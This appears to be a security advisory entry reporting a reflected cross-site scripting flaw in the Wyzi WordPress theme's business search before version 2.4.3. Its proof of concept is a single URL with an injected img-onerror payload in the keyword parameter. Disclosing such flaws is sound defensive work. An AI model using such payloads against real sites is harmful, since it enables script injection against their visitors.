Themes Vulnerabilities
Wyzi < 2.4.3 - Reflected Cross-Site Scripting (XSS)
Description
The Wyzi Theme was affected by reflected XSS vulnerabilities in the business search feature
Proof of Concept
https://example.com/business/?keyword=%22%3E%3Cimg%20src=x%20onerror=alert(/XSS/)%3Easd&wyz-loc-filter-txt=&loc-filter-txt=&loc-filter-lat=&loc-filter-lng=&category=&radius=0
Affects Themes
Fixed in version 2.4.3
References
Classification
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes
Timeline
Publicly Published
2021-02-06 (about 2 years ago)
Added
2021-02-06 (about 2 years ago)
Last Updated
2022-04-08 (about 11 months ago)